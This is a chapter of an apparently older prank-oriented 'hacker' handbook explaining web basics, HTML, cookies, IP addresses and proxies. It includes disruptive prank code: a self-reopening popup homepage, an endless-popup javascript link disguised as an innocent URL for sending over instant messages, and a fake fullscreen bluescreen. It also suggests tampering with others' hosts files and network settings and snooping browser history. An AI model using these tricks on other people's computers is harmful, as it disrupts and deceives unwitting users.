the internet and deceit | Tapeworm - 1337 Hax or Handbook

the web is a complex, but interesting place.

to access your web browser, go to: start > all programs > internet explorer. this is the program bundled with windows that can be used to visit different web pages. when you type in a web address, a request is sent using the http (hypertext transfer protocol) protocol; there are many different types of protocols and each has its own use. a protocol is the agreed upon format that computers use to talk to each other (like a language). when an http request is sent, the request bounces from server to server until it reaches its destination, where your request is processed and a web page is sent back. a server is a computer set up to handle such requests, and you could turn your computer into a server if you wanted to host your own web pages, although most people prefer to pay a monthly fee to a third-party provider to "host" their web pages and e-mail for them in order to avoid learning the technical side of it.

the real cost of hosting comes with "bandwidth," which is the amount of data you can transfer in a given amount of time (whenever you request an image or web page, you're requesting data and using up bandwidth), and as a result, high-traffic web sites have very costly hosts. bandwidth goes both ways; you have an upload transfer limit as well: the big difference between a high-speed and dial-up connection. if you're using dial-up, you may think "i wouldn't use the internet any more on a high-speed connection than i already do" but what you don't understand is that once you switch, it's no longer a prescription drug where you stop by every once in a while to pick up your dosage, it's a freakin' i.v.

since dial-up users often get disconnected, software tools have been developed to save download progress, meaning if you're downloading a big file and lose your connection, you can resume where you left off rather than starting over. i'd tell you more but dial-up users suck and we don't care about them. we need speed! for pr0n!

one thing to watch out for on dial-up is dial-up hijacking, where your access number is changed to dial something long-distance, racking up your phone bill.

the address you type in to access a website is referred to as a "domain" or uri (universal resource identifier), which anybody can register for a yearly fee if the name you want is available, then you can configure the domain to point to your host or redirect to another website. if you want to reserve a domain for yourself, one of the most popular registrars is www.netsol.com, although cheaper alternatives are available. if the domain you want isn't available, you can at least see who owns it (a good place to find contact information for those obscure websites that don't like to be contacted). you actually have all of the tools you need to start building web pages on your computer already; we'll cover the basics. if you're interested in building web pages (it's fun stuff), you need to know html (hypertext markup language). html is the easiest, most basic language out there, and anybody even semi-techy knows it.

there are entire books on html that explain it in depth, and i will attempt to sum it up for you in a few paragraphs. i wasn't originally going to discuss the language but it is critical as a 1337 h4x0r to understand and know this like the back of their hand. html basically arranges the content of a web page, and decides how that content will look; the browser's job is to read the html code and render it as a web page. every tag in html has an opening tag and a closing tag, or is otherwise self-closing. whatever is in between the tags is affected, and tags can have optional "attributes" that further describe them. if i wanted to refer to myself as a geek i could type:

 <geek> tapeworm </geek>

or:

 <geek name="tapeworm" />

although "geek" is not an actual tag, and you can't make tags up. html has several pre-defined tags and each has a special meaning. refer to the following table (this is not a complete list):

handy html

br = break/new line (self-closing)
hr = horizontal line (self-closing)
ol = ordered (numbered) list
ul = unordered (bulleted) list
li = list item
b = bold
u = underline
i = italic
s = strikethrough
marquee = scrolling text

not mentioned above; the "font" tag decides how text will look, and the "table" tag can be used to organize content within rectangular blocks with its two additional tags "tr" (table row) and "td" (table data/cell). to insert images you can use "img src" (image source), and for links "a href" (anchor hypertext reference). the list goes on… following is a very simple example of how a web page is constructed; you can save the code in notepad as an .html file and then open it to see how the browser renders the code. i encourage you to experiment with it.

 <html> <head><title>the title is up here</title> </head> <body bgcolor="gray"> <ul> <li>one</li> <li>two</li> <li>threeee</li> </ul> <hr /> <table bgcolor="black" border="1" align="center" width="600"  height="100%" cellpadding="5" cellspacing="5"> <tr><td bgcolor="#ff0000" align="right"> <!-- this is a hidden comment, and the #ff0000 seen on the previous line is hex code for the color red --> <font face="comic sans ms" color="" size="13"> hello <b>th</b><u>e</u><s>re</s>.. </font> </td><td> <marquee><font color="green">&lt;0wnz0rz&gt; tapeworm &lt;/0wnz0rz&gt;</font></marquee> <!-- the above tags are ways to represent "less than" and "greater than" or to print code examples without them being interpreted as html --> </td></tr> </table> <a href="c:\temp\bluescreen.jpg"> <img width="100" height="100" src="/books/3/278/1/html/2/file:///c:/temp/bluescreen.jpg" alt="this looks familiar" /> <br />click me</a> </body> </html>

at first glance this probably looks like a bunch of gibberish, but if you take the time to carefully read through it and refer to the previously mentioned table then you will see that everything has a meaning. if anybody tries to teach you "frames" just walk away; frames suck. overall html is a very forgiving and sloppy language, meaning you can make all sorts of mistakes and the browser will never tell you about errors. that should pretty much give you at least a vague idea of how it works; for a decent tutorial (which you should research) just visit www.htmlgoodies.com.

note

building web pages is great fun, so long as you don't get a case of the i-want-my-site-to-have-everythings.

you can right-click on any web page and select the option to "view source" and you can see all of the client-side code that makes up that web page (the server-side code is only available to the server). there are ways that web developers attempt to hide their client-side source code, but there is always a way to find it. it's the same with images: many developers don't want you to be able to save images or access them directly, but it's impossible to prevent. the more you research web development, the more you will understand how a web site is organized and how to find things in places you would have never thought to look before.

being able to view the client-side code allows you to see file paths and different values that are being sent back and forth. a good developer always verifies what data is sent from the client, but then some developers are lazy. by manipulating cookies (i'll get to cookies in a minute), client-side code, or uri information, you can sometimes do things that you're not supposed to. for example, you might be able to access directories of images and private content, hijack someone else's account, cheat online polls (voting systems), or unlock forum topics that have been restricted by the administrator. forums are very good places to get help with certain things as they usually revolve around a particular topic; they are especially popular in development communities to help each other with particular coding languages.

some forums and guestbooks (especially those found on local band sites) allow you to use html in your posts, or perhaps their own variation of html known as bb (bulletin board) code. i find it incredibly hard to resist typing something as simple as "</table>" into some poor sap's guestbook, just to see if html is actually enabled and to laugh when it messes up their display.

one of the most popular attacks against websites is called a ddos (distributed denial of service), which more or less floods a server with fake traffic.

a common saying amongst developers is "don't reinvent the wheel," which means don't code something that has already been coded. developers share code all of the time to save each other hassles. the problem with a lot of different sites using the same code is that if the code isn't secure and a vulnerability becomes exposed, people could hop around taking advantage of every website that is using the code. what's worse is that it takes very little effort to look up known vulnerabilities, and this goes both ways; simply by visiting a website, it is possible that the server-side code could take advantage of a known vulnerability in your browser and manipulate your system. in a nutshell, the more you learn (whether it be web development, networking, etc) the safer you will be.

as easy as it is to build a web page, many people do so with the intentions of deceiving you. what if you received an e-mail from the government or some other seemingly legitimate company telling you to visit a website and verify financial information? this is known as "phishing." anyone can mask the "from" e-mail address to make it look like anything they want; i will show you how later. these e-mails and websites are made up to look official, even with official-looking domains and stolen logos. don't be a moron: no legitimate company or government is going to ask you for confidential information via e-mail without having you first login to a pre-existing secure account, and even the odds of that are extremely slim. the internet is not secure enough to store personal information, and nobody in their right mind should do it. fake websites aren't the only trick in the book either. with all of those servers your requests are being bounced through, it is very likely that somebody may be eavesdropping or watching your requests pass by. if you were submitting any type of confidential information such as placing an order, this could pose a problem. you more or less need to use your best judgment about the websites through which you transmit personal information. a good thing to look for before submitting anything is whether or not the page is using an https protocol; the "s" stands for secure but neither of the t's stand for trusted. you might want to check with a website prior to placing an order to make sure your financial information isn't going to be stored in an online database.

another important thing to understand about web pages is the difference between client-side and server-side. the client is your computer, while the server is the computer hosting the website. coding languages are written for both the client and the server but usually only one or the other. a client-side language is interpreted by your browser, while a server-side language is interpreted by the web server. every time you reload a page or submit a request, it goes to the server, but if you see something being updated on-the-fly without having to reload the page (such as a menu is opening or a clock counting) then that is client-side functionality. unless, of course, you're connected through a java applet or sumthin.

the cool thing about having a server on your own computer is that it allows you to execute your server-side code without having to first login to a third-party host. this is especially useful to web developers, as you could build a fully functional database driven website offline. xp professional comes with the iis (internet information server) and apache (www.apache.org) is a free alternative.

a "cookie" is a client-side file that a web site can store on your computer to remember you; it stores information that you may have entered on the site (to save you from having to enter it again) or allows you to be automatically logged in when you come back. just because a website can store a cookie on your machine, or tell what operating system you're running, or find out your ip address, or know what size your screen resolution is, or tell you what browser you're using, it doesn't mean that it can access your computer files (because it can't). that is all just basic, public information used for statistics, convenience, and delivering a website optimized for your machine (a website has to be available to a large number of browsers and operating systems, and each renders code differently). statistical information gathered from websites is usually used to customize their advertisements or website according to what you like (by comparing ads to items you've looked at for example). otherwise, a website only has access to the information you give them. you can disable cookies but there really is no valid reason to do so unless you don't like people knowing what links you've clicked or you're on a public computer and don't want other people seeing where you've been. by the way, if you're ever on a public computer, see if you can look where other people have been :-)

double-click the "internet options" icon inside of your control panel. if you click the "settings" button in the section marked "temporary internet files" and then click the "view files" button, you can see every file that has been cached from web surfing. when you surf the internet, certain files are stored on your computer (in the cache) so that they not only load quicker the next time you visit the page, but also save the website bandwidth because you're not constantly re-downloading the same things from page to page. a website can prevent items from being cached if it wants to, to prevent you from snatching movies or the like (but it's a good place to look in the case of the lazy developer). this is clearly a good place to see where people have been, although an easier place to review past surfing is in the "history" folder, which can be found in c:\documents and settings\user name\local settings\. be sure to delete your temporary internet files (cookies included) and clear the history if you're paranoid about someone using a computer after you.

the setting for "home page" in your internet options is the website or file on your computer that automatically loads every time you open the browser. if you were to take the following code (which is a mix of html and javascript, both client-side languages), type it in notepad, save it in the temp folder we created earlier as an .html file, then set your homepage as file:///c:/temp/popuphell.html (assuming you named your file popuphell.html)then every time you opened a browser it would continue to open new browsers until the max has been reached. this is actually a really fun game to play: how quickly can you kill the popup windows?! if you have sp2 installed (a windows update), then ie has a built-in popup blocker that you may need to disable for this to work: just go to tools > pop-up blocker > turn off pop-up blocker or add it to your trusted sites as described below. with a little web design knowledge you could have a lot of fun with this one; get creative.

 <html> <body onload="window.open('file:///c:/temp/popuphell.html')"> <!-- pwn3d. --> </body> </html>

if popup windows don't suit your fancy, how about some javascript alert boxes?

 <html> <body> <script language="javascript"> alert("whhaassssuuuppp!!!") alert("lolz!") alert("i am totally 0wnz0ring you!") alert("u = boring.") alert("k's bai!") </script> </body> </html>

you can find free html and javascript code all over the place to do pretty much whatever you want.

another useful javascript code to create popup windows would be to create a link as follows:

 <a href="javascript:while(1){ w=window.open();d=w.document;d.open(); d.writeln('<script>while(1){ window.opoen()} (/script>');d.close()} ">http:// innocuous.looking.url/</a>

you could save this link in a file (popuphell2.html) or even send it over an instant message haha. again, sp2 is really weird with javascript; we'll talk a little more about it later.

an alternative to our bluescreen-screensaver:

 <html> <head> <script language="javascript"> function fullscreen (url){ window.open(url,",'fullscreen=yes,scrollbars=auto'); } </script> </head> <body onload="fullscreen(path to our image)"> </body> </html>

this basically opens ie in full screen mode, with the toolbars hidden. any image can be used, for example, an animated image of a windows bootup screen. people can rarely figure out how to get out of this one.

through the "view" option at the top of your browser you can somewhat customize the buttons and appearance. simply removing the address bar from display might be enough to screw with a newbie's head for a while.

in the "security" tab of your internet options, you can add trusted or restricted websites. it could be a little funny to block someone's favorite site, or a personal site you don't want family visiting. if they figure out how to re-enable it, there is another way you can re-block it :-) go to "c:\winnt\system32\drivers\etc" to find a file called "hosts." you can add ip (internet protocol) and web addresses to this file by editing it in notepad; there should already be an example in there to follow. entries added in this file redirect all requests to the ip 127.0.0.1 (the ip every computer uses to point to itself), essentially blocking those websites, or you can redirect the sites as well. for example, if you inserted "www.icodeviruses.com www.aol.com" it would redirect all requests for aol.com to my 1337 w3bp4g3. viruses might use the hosts file to block update sites that your anti-virus program would use to detect it.

think of an ip as a computer address: every computer has one and every ip is unique although ip's for personal computers can (and do often) change unless they are static. to get a website's ip address, just press win+r, type "cmd" to bring up the dos prompt, and then type "ping www.address.com" (or type "ipconfig" to get your own ip address). the ip will appear as four sets of numbers separated by periods. you can request a new ip by typing the following:

 ipconfig /release ipconfig /renew

then rebooting your computer.

ip's are used to communicate with other ip's, via the internet's basic communication language: tcp/ip (transmission control protocol), which was developed by the dod (department of defense). tcp handles data (or packets), while ip handles destination. even website addresses use ip's: the names that you type in your browser are simply masks for the website's ip (for convenience), which are converted by the dns (domain name system). all this ip and different protocol stuff can be pretty nauseating.

ip (version 4) is a 32-bit address space represented by a set of four numbers (ranging from 0 to 255) separated by periods; this allows for roughly 4 billion different addresses. that may sound like a lot, but there are less ip's with ipv4 than there are people in the world, which means sooner or later we're going to run out. to resolve this problem there is ipv6, which is a 128-bit address space, allowing for roughly 340 undecillion different addresses (that's 340 followed by 36 zeros). ipv4 hasn't died yet, but when it does, ip addresses will begin to look substantially different. ipv6 uses a hexadecimal representation rather than just decimal. hexadecimal is a combination of letters and numbers, revolving around multiplications of 16. if you take a 128-bit address in binary form, divide it into 16 boundaries, and convert each boundary into hexadecimal (or base 16) then you'll end up with an address that looks something like this (the future ip):

32fe:b1:1d4a:0:fe73:ee:2da:2b9a

xp has ipv6 support which you can experiment with, if u want. access in dos by typing ipv6/?.

if you access your "network connections" icon within your control panel, right-click your connection to select properties, highlight tcp/ip, and click the "properties" button, you can change the way it obtains an ip, essentially disabling someone's internet connection.

many networks, schools, etc love to block certain websites. there are many ways to access blocked sites. the easiest and probably most effective way to achieve this is through a free "proxy server," which you can find by searching the web. a proxy server is more or less a cache for an isp, so when you make a request for a website they will first check to see if a copy is stored in their proxy before searching the internet. by using a third-party proxy (once you find one, you can configure it within your internet options in the "connections" tab), rather than requesting the blocked page from the isp, you make a request to a server that's not blocked and ask that server to display the site for you. in other words, you bounce the request through another computer. proxy servers can also be used to somewhat anonymize your web surfing. if you don't have access to your internet options then you might try searching for a "web redirection" service as an alternative.

if you're using a router (allowing you to share your internet connection with several computers), then using "ipconfig" as mentioned above may not give you your outside ip (your ip as it appears to the rest of the world), but rather an ip associated with your local network. if this is the case, you can find your real ip several ways, an easy way is just to visit www.whatismyip.com.

ip addresses are distributed in blocks to different network providers or private companies, and then eventually assigned to you by your isp. think of a block as numbers 0.0.0.0 through 10.10.10.10. certain blocks are reserved, such as for local networks. for example, if you use a router, it will assign different ip's to each computer on your network (likely in the block 192.168.0.0192.168.255.255), but you're still given an ip from your isp, through which the connection is then "routed" via the router to share the connection. you can look up an ip's "block owner" via either of the following addresses to report abuse or whatever (although these sites are mainly for u.s. based ip's):

www.arin.net/whois/

www.internic.net/whois.html

additionally, anything you don't understand about he web, just look up an rfc (request for comments) at rfc-editor.org and ietf.org.